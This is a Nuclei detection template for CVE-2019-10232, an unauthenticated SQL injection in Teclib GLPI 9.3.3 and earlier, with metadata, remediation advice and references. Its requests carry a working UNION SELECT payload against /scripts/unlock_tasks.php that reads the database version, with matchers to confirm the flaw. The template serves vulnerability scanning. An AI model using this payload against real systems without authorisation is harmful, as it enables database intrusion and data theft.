nuclei-templates/http/cves/2019/CVE-2019-10232.yaml

50 lines
1.9 KiB
YAML

id: CVE-2019-10232
info:
name: Teclib GLPI <= 9.3.3 - Unauthenticated SQL Injection
author: RedTeamBrasil
severity: critical
description: Teclib GLPI <= 9.3.3 exposes a script (/scripts/unlock_tasks.php) that incorrectly sanitizes user controlled data before using it in SQL queries. Thus, an attacker could abuse the affected feature to alter the semantic original SQL query and retrieve database records.
remediation: |
Upgrade to a patched version of Teclib GLPI (9.3.4 or later) to mitigate this vulnerability.
reference:
- https://www.synacktiv.com/ressources/advisories/GLPI_9.3.3_SQL_Injection.pdf
- https://github.com/glpi-project/glpi/commit/684d4fc423652ec7dde21cac4d41c2df53f56b3c
- https://nvd.nist.gov/vuln/detail/CVE-2019-10232
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2019-10232
cwe-id: CWE-89
epss-score: 0.14229
epss-percentile: 0.95165
cpe: cpe:2.3:a:teclib-edition:gestionnaire_libre_de_parc_informatique:*:*:*:*:*:*:*:*
metadata:
max-request: 2
vendor: teclib-edition
product: gestionnaire_libre_de_parc_informatique
tags: cve,cve2019,glpi,sqli,injection
http:
- method: GET
path:
- "{{BaseURL}}/glpi/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1"
- "{{BaseURL}}/scripts/unlock_tasks.php?cycle=1%20UNION%20ALL%20SELECT%201,(@@version)--%20&only_tasks=1"
stop-at-first-match: true
matchers:
- type: word
part: body
words:
- "-MariaDB-"
- "Start unlock script"
condition: and
extractors:
- type: regex
regex:
- "[0-9]{1,2}.[0-9]{1,2}.[0-9]{1,2}-MariaDB"
part: body
# digest: 4a0a00473045022100d133499151779c25cea303532eea54d8a9b0f269e25ce9bbfe95caa5f3a28a8502202b4c3bf5fd815d7af7eac4d17de7b8ed198c4037f59b027b3c030cee1d65fe7b:922c64590222798bb761d5b6d8e72950